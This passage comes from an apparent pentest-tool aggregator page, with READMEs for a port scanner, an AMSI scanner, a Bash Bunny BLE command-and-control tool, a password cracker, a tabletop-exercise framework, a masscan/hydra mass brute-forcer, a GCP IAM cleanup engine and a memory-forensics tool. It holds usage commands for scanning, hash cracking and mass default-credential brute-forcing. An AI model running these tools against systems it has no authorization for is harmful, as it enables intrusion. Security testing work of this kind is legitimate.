    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:

    Contact



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

    By: Zion3R β€” December 17th 2023 at 11:30


    NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.
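    For orientation, the core of a TCP connect scan of the kind NetworkSherlock performs boils down to the minimal sketch below (illustrative only; the real tool adds UDP support, banner grabbing, Shodan lookups and more). Only scan hosts you are authorized to test.

    import socket
    from concurrent.futures import ThreadPoolExecutor

    def check_port(host, port, timeout=1.0):
        # TCP "connect scan": the port is open if the three-way handshake succeeds.
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:
                print(f'{port}/tcp open')

    host = '192.168.1.1'  # placeholder target
    with ThreadPoolExecutor(max_workers=20) as pool:
        for port in range(1, 1025):
            pool.submit(check_port, host, port)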


    Features

    • Scans multiple IPs, IP ranges, and CIDR blocks.
    • Supports port scanning over TCP and UDP protocols.
    • Detailed banner grabbing feature.
    • Ping check for identifying reachable targets.
    • Multi-threading support for fast scanning operations.
    • Option to save scan results to a file.
    • Provides detailed version information.
    • Colorful console output for better readability.
    • Shodan integration for enhanced scanning capabilities.
    • Configuration file support for Shodan API key.

    Installation

    NetworkSherlock requires Python 3.6 or later.

    1. Clone the repository:
      git clone https://github.com/HalilDeniz/NetworkSherlock.git
    2. Install the required packages:
      pip install -r requirements.txt

    Configuration

    Update the networksherlock.cfg file with your Shodan API key:

    [SHODAN]
    api_key = YOUR_SHODAN_API_KEY

    Usage

    python3 networksherlock.py --help
    usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

    NetworkSherlock: Port Scan Tool

    positional arguments:
    target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
    192.168.1.0/24)

    options:
    -h, --help show this help message and exit
    -p PORTS, --ports PORTS
    Ports to scan (e.g. 1-1024, 21,22,80, or 80)
    -t THREADS, --threads THREADS
    Number of threads to use
    -P {tcp,udp}, --protocol {tcp,udp}
    Protocol to use for scanning
    -V, --version-info Used to get version information
    -s SAVE_RESULTS, --save-results SAVE_RESULTS
    File to save scan results
    -c, --ping-check Perform ping check before scanning
    --use-shodan Enable Shodan integration for additional information

    Basic Parameters

    • target: The target IP address(es), IP range, or CIDR block to scan.
    • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
    • -t, --threads: Number of threads to use.
    • -P, --protocol: Protocol to use for scanning (tcp or udp).
    • -V, --version-info: Obtain version information during banner grabbing.
    • -s, --save-results: Save results to the specified file.
    • -c, --ping-check: Perform a ping check before scanning.
    • --use-shodan: Enable Shodan integration.
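For context on the banner grabbing feature, below is a rough sketch of how TCP banner grabbing generally works (illustrative only, not NetworkSherlock's actual implementation; the IP and port in the usage comment are placeholders):

import socket

def grab_banner(ip, port, timeout=2):
    # Connect and read whatever the service volunteers as its banner
    try:
        with socket.create_connection((ip, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(1024).decode(errors="ignore").strip()
            except socket.timeout:
                return ""
    except OSError:
        return None

# print(grab_banner("192.168.1.1", 22))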

    Example Usage

    Basic Port Scan

    Scan a single IP address on default ports:

    python networksherlock.py 192.168.1.1

    Custom Port Range

    Scan an IP address with a custom range of ports:

    python networksherlock.py 192.168.1.1 -p 1-1024

    Multiple IPs and Port Specification

    Scan multiple IP addresses on specific ports:

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

    CIDR Block Scan

    Scan an entire subnet using CIDR notation:

    python networksherlock.py 192.168.1.0/24 -p 80

    Using Multi-Threading

    Perform a scan using multiple threads for faster execution:

    python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

    Scanning with Protocol Selection

    Scan using a specific protocol (TCP or UDP):

    python networksherlock.py 192.168.1.1 -p 53 -P udp

    Scan with Shodan

    python networksherlock.py 192.168.1.1 --use-shodan

    Scan Multiple Targets with Shodan

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

    Banner Grabbing and Save Results

    Perform a detailed scan with banner grabbing and save results to a file:

    python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt

    Ping Check Before Scanning

    Scan an IP range after performing a ping check:

    python networksherlock.py 10.0.0.1-10.0.0.255 -c

    OUTPUT EXAMPLE

$ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-6000
    Threads : 25
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    21 /tcp open telnet 220 (vsFTPd 2.3.4)
    80 /tcp open http HTTP/1.1 200 OK
    139 /tcp open netbios-ssn %SMBr
    25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
    23 /tcp open smtp #' #'
    445 /tcp open microsoft-ds %SMBr
    514 /tcp open shell
    512 /tcp open exec Where are you?
    1524/tcp open ingreslock ro ot@metasploitable:/#
    2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
    3306/tcp open mysql >
    5900/tcp open unknown RFB 003.003
    53 /tcp open domain
    ---------------------------------------------

Output Example

    $ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
    ********************************************
    Scanning target: 10.0.2.1
    Scanning IP : 10.0.2.1
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    53 /tcp open domain
    ********************************************
    Scanning target: 10.0.2.2
    Scanning IP : 10.0.2.2
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    445 /tcp open microsoft-ds
    135 /tcp open epmap
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21- 1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    21 /tcp open ftp 220 (vsFTPd 2.3.4)
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    23 /tcp open telnet #'
    80 /tcp open http HTTP/1.1 200 OK
    53 /tcp open kpasswd 464/udpcp
    445 /tcp open domain %SMBr
    3306/tcp open mysql >
    ********************************************
    Scanning target: 10.0.2.20
    Scanning IP : 10.0.2.20
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

    Contributing

    Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

    By: Zion3R β€” December 10th 2023 at 11:30


    py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


    Installation

    • Via pip

      pip install pyamsi
    • Clone repository

      git clone https://github.com/Tomiwa-Ot/py-amsi.git
      cd py-amsi/
      python setup.py install

    Usage

    from pyamsi import Amsi

    # Scan a file
    Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

    # Scan string
    Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

    # Both functions return a dictionary of the format
    # {
    # 'Sample Size' : 68, // The string/file size in bytes
    # 'Risk Level' : 0, // The risk level as suggested by the antivirus
    # 'Message' : 'File is clean' // Response message
    # }
Risk Level | Meaning
0          | AMSI_RESULT_CLEAN (File is clean)
1          | AMSI_RESULT_NOT_DETECTED (No threat detected)
16384      | AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479      | AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768      | AMSI_RESULT_DETECTED (File is considered malware)
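As a quick illustration, here is a minimal sketch of how the returned dictionary might be used, assuming the keys shown above ('Risk Level', 'Message') and treating 32768 (AMSI_RESULT_DETECTED) as the detection value; the sample string is hypothetical:

from pyamsi import Amsi

# Scan a string and interpret the result using the keys documented above
result = Amsi.scan_string("Invoke-Mimikatz", "suspicious_string")  # hypothetical sample input
if result.get("Risk Level", 0) >= 32768:  # AMSI_RESULT_DETECTED
    print("Detected:", result.get("Message"))
else:
    print("Clean or not detected:", result.get("Message"))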

    Docs

    https://tomiwa-ot.github.io/py-amsi/index.html



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    BlueBunny - BLE Based C2 For Hak5's Bash Bunny

    By: Zion3R β€” December 7th 2023 at 11:30


    C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
    Send your Bash Bunny all the instructions it needs just over the air.

    Overview

    Structure


    Installation & Start

    1. Install required dependencies
    pip install pygatt "pygatt[GATTTOOL]"

    Make sure BlueZ is installed and gatttool is usable

    sudo apt install bluez
2. Download BlueBunny's repository (and switch into the correct folder)
    git clone https://github.com/90N45-d3v/BlueBunny
    cd BlueBunny/C2
3. Start the C2 server
    sudo python c2-server.py
4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).
5. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (Your Bash Bunny will light up green when it's ready to pair).

    Manual communication with the Bash Bunny through Python

    You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

    Example Code

    # Import the backend (BlueBunny/C2/BunnyLE.py)
    import BunnyLE

    # Define the data to send
    data = "QUACK STRING I love my Bash Bunny"
# Define the type of the data to send ("cmd" or "payload"); payload data will be temporarily written to a file so that multiple commands can be executed, as in a payload script file
    d_type = "cmd"

    # Initialize BunnyLE
    BunnyLE.init()

    # Connect to your Bash Bunny
    bb = BunnyLE.connect()

    # Send the data and let it execute
    BunnyLE.send(bb, data, d_type)

    Troubleshooting

    Connecting your Bash Bunny doesn't work? Try the following instructions:

    • Try connecting a few more times
    • Check if your bluetooth adapter is available
    • Restart the system your C2 server is running on
    • Check if your Bash Bunny is running the BlueBunny payload properly
    • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

    Bugs within BlueZ

    The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem due to BlueZ. Here are some kind of errors that can be caused by temporary bugs. These usually disappear at the latest after rebooting the C2's operating system, so don't be surprised and calm down if they show up.

    • Timeout after 5.0 seconds
    • Unknown error while scanning for BLE devices

    Working on...

    • Remote shell access
    • BLE exfiltration channel
    • Improved connecting process

    Additional information

    As I said, BlueZ, the base for the bluetooth part used in BlueBunny, is somewhat bug prone. If you encounter any non-temporary bugs when connecting to Bash Bunny as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution or just a nice feedback.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    PassBreaker - Command-line Password Cracking Tool Developed In Python

    By: Zion3R β€” December 6th 2023 at 11:30


PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.

    Features

    • Wordlist-based password cracking
    • Brute force password cracking
    • Support for multiple hash algorithms
    • Optional salt value
    • Parallel processing option for faster cracking
    • Password complexity evaluation
    • Customizable minimum and maximum password length
    • Customizable character set for brute force attacks

    Installation

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/PassBreaker.git
    2. Install the required dependencies:

      pip install -r requirements.txt

    Usage

    python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

    Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

    Options

    • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
    • -s, --salt <salt>: Specify a salt value to use.
    • -p, --parallel: Enable parallel processing for faster cracking.
    • -c, --complexity: Evaluate password complexity before cracking.
    • -b, --brute-force: Perform a brute force attack.
    • --min-length <min_length>: Set the minimum password length for brute force attacks.
    • --max-length <max_length>: Set the maximum password length for brute force attacks.
    • --character-set <character_set>: Set the character set to use for brute force attacks.


    Usage Examples

    Wordlist-based Password Cracking

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

    This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
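Conceptually, wordlist-based cracking hashes each candidate and compares it to the target; a minimal sketch (illustrative only, not PassBreaker's actual code) looks like this:

import hashlib

def crack_with_wordlist(target_hash, wordlist_path, algorithm="md5"):
    # Hash every candidate in the wordlist and compare against the target hash
    with open(wordlist_path, "r", encoding="utf-8", errors="ignore") as wordlist:
        for line in wordlist:
            candidate = line.strip()
            if hashlib.new(algorithm, candidate.encode()).hexdigest() == target_hash:
                return candidate
    return None

# print(crack_with_wordlist("5f4dcc3b5aa765d61d8327deb882cf99", "passwords.txt"))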

    Brute Force Attack

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

    This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".
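The brute force mode works the same way, except the candidates are generated from the character set; a minimal sketch matching the example above (again illustrative, not the tool's implementation) is:

import hashlib
from itertools import product

def brute_force(target_hash, charset="abc123", min_len=6, max_len=8, algorithm="md5"):
    # Try every combination of the charset between min_len and max_len characters
    for length in range(min_len, max_len + 1):
        for combo in product(charset, repeat=length):
            candidate = "".join(combo)
            if hashlib.new(algorithm, candidate.encode()).hexdigest() == target_hash:
                return candidate
    return None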

    Password Complexity Evaluation

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

    This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

    Using Salt Value

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

    This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

    Parallel Processing

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

    This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

    These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

    Disclaimer

    This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

    Contributing

    Contributions are welcome! To contribute to PassBreaker, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

    License

    PassBreaker is released under the MIT License. See LICENSE for more information.



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    T3SF - Technical Tabletop Exercises Simulation Framework

    By: Zion3R β€” December 2nd 2023 at 11:30


T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL), together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module communicates with the platform-specific module (Discord, Slack, Telegram, etc.), which presents the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organization, single area" and "multiple organization, multiple areas".


    Getting Things Ready

    To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.

    To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!

    # Python 3.6+ required
    python -m venv .venv # We will create a python virtual environment
    source .venv/bin/activate # Let's get inside it

    pip install -U pip # Upgrade pip

    Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:

    pip install "T3SF[Discord]"  # Install the framework to work with Discord

    or

    pip install "T3SF[Slack]"  # Install the framework to work with Slack

    This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.

    We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:

    Usage

    We created this framework to simplify all your work!

    Using Docker

    Supported Tags

    • slack β†’ This image has all the requirements to perform an exercise in Slack.
    • discord β†’ This image has all the requirements to perform an exercise in Discord.

    Using it with Slack

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack

    Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.

    Using it with Discord

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord

    Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.


    Once you have everything ready, use our template for the main.py, or modify the following code:

    Here is an example if you want to run the framework with the Discord bot and a GUI.

from T3SF import T3SF
import asyncio

async def main():
    await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)

if __name__ == '__main__':
    asyncio.run(main())

    Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it!

    Yes, that simple!

    await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)

    If you need more help, you can always check our documentation here!



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    Mass-Bruter - Mass Bruteforce Network Protocols

    By: Zion3R β€” November 26th 2023 at 11:30


    Mass bruteforce network protocols

    Info

A simple personal script to quickly mass-bruteforce common services across a large network.
It will check for default credentials on FTP, SSH, MySQL, MSSQL, etc.
This was made for authorized red team penetration testing purposes only.


    How it works

1. Use masscan (faster than nmap) to find alive hosts with common ports in the network segment.
2. Parse IPs and ports from the masscan result.
3. Craft and run hydra commands to automatically bruteforce supported network services on the devices, as shown in the sketch below.
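A minimal sketch of steps 2 and 3 (illustrative only, not the script's actual code; the wordlist file names and the port-to-service mapping are assumptions): parse masscan's "Discovered open port <port>/tcp on <ip>" lines and turn them into hydra commands.

import re

PORT_TO_SERVICE = {21: "ftp", 22: "ssh", 23: "telnet", 1433: "mssql", 3306: "mysql", 5432: "postgres"}

def parse_masscan(path):
    # masscan prints lines like: "Discovered open port 22/tcp on 10.0.2.12"
    pattern = re.compile(r"Discovered open port (\d+)/tcp on ([\d.]+)")
    with open(path) as f:
        for line in f:
            match = pattern.search(line)
            if match:
                yield int(match.group(1)), match.group(2)

def hydra_commands(path, userlist="users.txt", passlist="passwords.txt"):
    # Build one hydra command per recognized ip:port pair
    for port, ip in parse_masscan(path):
        service = PORT_TO_SERVICE.get(port)
        if service:
            yield f"hydra -L {userlist} -P {passlist} -s {port} {service}://{ip}"

# for cmd in hydra_commands("./result/masscan/masscan_test.txt"):
#     print(cmd)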

    Requirements

    • Kali linux or any preferred linux distribution
    • Python 3.10+
    # Clone the repo
    git clone https://github.com/opabravo/mass-bruter
    cd mass-bruter

    # Install required tools for the script
    apt update && apt install seclists masscan hydra

    How To Use

Private IP ranges: 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

    Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

    Ex: masscan_192.168.0.0-16.txt

    Example command:

    masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

    Example Resume Command:

    masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

    Command Options

    β”Œβ”€β”€(rootγ‰Ώroot)-[~/mass-bruter]
    └─# python3 mass_bruteforce.py
    Usage: [OPTIONS]

    Mass Bruteforce Script

    Options:
    -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
    mssql, postgres, oracle)
    -a, --all Brute all services(Very Slow)
    -s, --show Show result with successful login
    -f, --file-path PATH The directory or file that contains masscan result
    [default: ./result/masscan/]
    --help Show this message and exit.

    Quick Bruteforce Example:

    python3 mass_bruteforce.py -q -f ~/masscan_script.txt

    Fetch cracked credentials:

    python3 mass_bruteforce.py -s

    Todo

    • Migrate with dpl4hydra
    • Optimize the code and functions
    • MultiProcessing

    Any contributions are welcomed!



    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

    CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

    By: Zion3R β€” November 21st 2023 at 11:30

    Clean up of over permissioned IAM accounts on GCP infra in an automated way

CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle enforcement on GCP cloud infra. It enables DevOps and Security teams to quickly clean up accounts in GCP infra that have been granted more permissions than they require. CureIAM fetches the recommendations and insights from the GCP IAM recommender, scores them and enforces those recommendations automatically on a daily basis. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of the GCP IAM recommender APIs and the Cloudmarker framework.


    Key features

    Discover what makes CureIAM scalable and production grade.

    • Config driven : The entire workflow of CureIAM is config driven. Skip to Config section to know more about it.
• Scalable : It is designed to scale thanks to its plugin-driven, multiprocess and multi-threaded approach.
• Handles Scheduling: Scheduling is embedded in CureIAM itself; configure the time, and CureIAM will run daily at that time.
• Plugin driven: The CureIAM codebase is completely plugin oriented, which means one can plug and play the existing plugins or create new ones to add more functionality.
• Track actionable insights: Every action that CureIAM takes is recorded for audit purposes. It can do that in a file store and in an Elasticsearch store, and you can build other store plugins to push the records to other stores for tracking purposes.
• Scoring and Enforcement: Every recommendation fetched by CureIAM is scored against various parameters, producing scores such as safe_to_apply_score, risk_score and over_privilege_score. Each score serves a different purpose; safe_to_apply_score, for example, identifies whether a recommendation can be applied automatically, based on the threshold set in the CureIAM.yaml config file.

    Usage

Since CureIAM is built with Python, you can run it locally with these commands. Before running, make sure a configuration file is present in one of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml, and that a service account JSON file is present in the current directory, preferably named cureiamSA.json. This SA private key can be named anything, but for the Docker image build it is preferred to use this name. Make sure to reference this file in the config for GCP cloud.

    # Install necessary dependencies
    $ pip install -r requirements.txt

    # Run CureIAM now
    $ python -m CureIAM -n

# Run the CureIAM process as a scheduler
    $ python -m CureIAM

    # Check CureIAM help
    $ python -m CureIAM --help

CureIAM can also be run inside a Docker environment; this is completely optional and can be used for CI/CD with a K8s cluster deployment.

    # Build docker image from dockerfile
    $ docker build -t cureiam .

# Run the image as a scheduler
    $ docker run -d cureiam

    # Run the image now
    $ docker run -f cureiam -m cureiam -n

    Config

The CureIAM.yaml configuration file is the heart of the CureIAM engine. Everything the engine does is based on the pipeline configured in this config file. Let's break it down into different sections to make the config look simpler.

1. Let's configure the first section: the logging configuration and the scheduler configuration.
logger:
  version: 1

  disable_existing_loggers: false

  formatters:
    verysimple:
      format: >-
        [%(process)s]
        %(name)s:%(lineno)d - %(message)s
      datefmt: "%Y-%m-%d %H:%M:%S"

  handlers:
    rich_console:
      class: rich.logging.RichHandler
      formatter: verysimple

    file:
      class: logging.handlers.TimedRotatingFileHandler
      formatter: simple
      filename: /tmp/CureIAM.log
      when: midnight
      encoding: utf8
      backupCount: 5

  loggers:
    adal-python:
      level: INFO

  root:
    level: INFO
    handlers:
      - rich_console
      - file

schedule: "16:00"

This subsection of the config uses the Rich logging module and schedules CureIAM to run daily at 16:00.

2. The next section configures the different modules which we might use in the pipeline. This falls under the plugins section in CureIAM.yaml. You can think of this section as the declaration of the different plugins.
plugins:
  gcpCloud:
    plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
    params:
      key_file_path: cureiamSA.json

  filestore:
    plugin: CureIAM.plugins.files.filestore.FileStore

  gcpIamProcessor:
    plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
    params:
      mode_scan: true
      mode_enforce: true
      enforcer:
        key_file_path: cureiamSA.json
        allowlist_projects:
          - alpha
        blocklist_projects:
          - beta
        blocklist_accounts:
          - foo@bar.com
        allowlist_account_types:
          - user
          - group
          - serviceAccount
        blocklist_account_types:
          - None
        min_safe_to_apply_score_user: 0
        min_safe_to_apply_score_group: 0
        min_safe_to_apply_score_SA: 50

  esstore:
    plugin: CureIAM.plugins.elastic.esstore.EsStore
    params:
      # Change http to https later if your elastic are using https
      scheme: http
      host: es-host.com
      port: 9200
      index: cureiam-stg
      username: security
      password: securepassword

Each of these plugin declarations has to be of this form:

plugins:
  <plugin-name>:
    plugin: <class-name-as-python-path>
    params:
      param1: val1
      param2: val2

For example, for the plugin CureIAM.stores.esstore.EsStore, the class is EsStore. All the params defined in the YAML have to match the parameters declared in the __init__() function of the same plugin class.
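As a rough illustration, a hypothetical store plugin (not part of CureIAM) whose __init__() parameters mirror the YAML params might look like the sketch below; the write()/done() method names follow the Cloudmarker-style store convention and are an assumption here:

class MyStore:
    # Hypothetical plugin: "param1" and "param2" must match the keys under "params" in the YAML
    def __init__(self, param1, param2):
        self.param1 = param1
        self.param2 = param2

    def write(self, record):
        # Persist one audit/enforcement record (assumed Cloudmarker-style store interface)
        print(self.param1, record)

    def done(self):
        # Called once the audit pipeline has finished (assumed)
        pass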

3. Once the plugins are defined, the next step is to define the pipeline for auditing. It goes like this:
audits:
  IAMAudit:
    clouds:
      - gcpCloud
    processors:
      - gcpIamProcessor
    stores:
      - filestore
      - esstore

Multiple audits can be created out of this. The one created here is named IAMAudit, with four plugins in use: gcpCloud, gcpIamProcessor, filestore and esstore. Note these are the same plugin names defined in Step 2. Again, this only defines the pipeline; it does not actually run it. The pipeline is run based on the definition in the next step.

4. Tell CureIAM to run the audits defined in the previous step.
run:
  - IAMAudits

And this makes up the entire configuration for CureIAM. You can find the full sample here; this config-driven pipeline concept is inherited from the Cloudmarker framework.

    Dashboard

    The JSON which is indexed in elasticsearch using Elasticsearch store plugin, can be used to generate dashboard in Kibana.

    Contribute

[Please do!] We are looking for any kind of contribution to improve CureIAM's core functionality and documentation. When in doubt, make a PR!

    Credits

    Gojek Product Security Team

    Demo


    =============

    NEW UPDATES May 2023 0.2.0

    Refactoring

• Breaking down the large code into multiple small functions
• Moving all plugins into the plugins folder: Esstore, files, Cloud and GCP.
• Adding fixes for zero-divide issues
• Migration to the new major version of Elastic
• Changed configuration in the CureIAM.yaml file
• Tested with Python 3.9.x

    Library Updates

Pinning library versions to avoid any backward-compatibility issues.

    • Elastic==8.7.0 # previously 7.17.9
    • elasticsearch==8.7.0
    • google-api-python-client==2.86.0
    • PyYAML==6.0
    • schedule==1.2.0
    • rich==13.3.5

    Docker Files

    • Adding Docker Compose for local Elastic and Kibana in elastic
• Adding .env-ex; rename .env-ex to .env before running Docker
    Running docker compose: docker-compose -f docker_compose_es.yaml up 

    Features

    • Adding the capability to run scan without applying the recommendation. By default, if mode_scan is false, mode_enforce won't be running.
          mode_scan: true
    mode_enforce: false
    • Turn off the email function temporarily.


    ☐ β˜† βœ‡ KitPloit - PenTest Tools!

MemTracer - Memory Scanner

    By: Zion3R β€” November 20th 2023 at 11:30


MemTracer is a tool that offers live memory analysis capabilities, allowing digital forensic practitioners to discover and investigate stealthy attack traces hidden in memory. MemTracer is implemented in Python and aims to detect reflectively loaded native .NET framework Dynamic-Link Libraries (DLLs). This is achieved by looking for the following abnormal memory region characteristics:

    • The state of memory pages flags in each memory region. Specifically, the MEM_COMMIT flag which is used to reserve memory pages for virtual memory use.
    • The type of pages in the region. The MEM_MAPPED page type indicates that the memory pages within the region are mapped into the view of a section.
    • The memory protection for the region. The PAGE_READWRITE protection to indicate that the memory region is readable and writable, which happens if Assembly.Load(byte[]) method is used to load a module into memory.
    • The memory region contains a PE header.
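As a rough, Windows-only sketch of this kind of check (illustrative, not MemTracer's actual code), one can walk a process's address space with VirtualQueryEx and flag committed, mapped, read-write regions that begin with an MZ header; the PID in the usage comment is a placeholder:

import ctypes
import ctypes.wintypes as wt

MEM_COMMIT, MEM_MAPPED, PAGE_READWRITE = 0x1000, 0x40000, 0x04
PROCESS_QUERY_INFORMATION, PROCESS_VM_READ = 0x0400, 0x0010

class MEMORY_BASIC_INFORMATION(ctypes.Structure):
    _fields_ = [("BaseAddress", ctypes.c_void_p),
                ("AllocationBase", ctypes.c_void_p),
                ("AllocationProtect", wt.DWORD),
                ("RegionSize", ctypes.c_size_t),
                ("State", wt.DWORD),
                ("Protect", wt.DWORD),
                ("Type", wt.DWORD)]

def suspicious_regions(pid):
    # Walk the target process's memory regions and yield the ones matching the symptoms above
    k32 = ctypes.windll.kernel32
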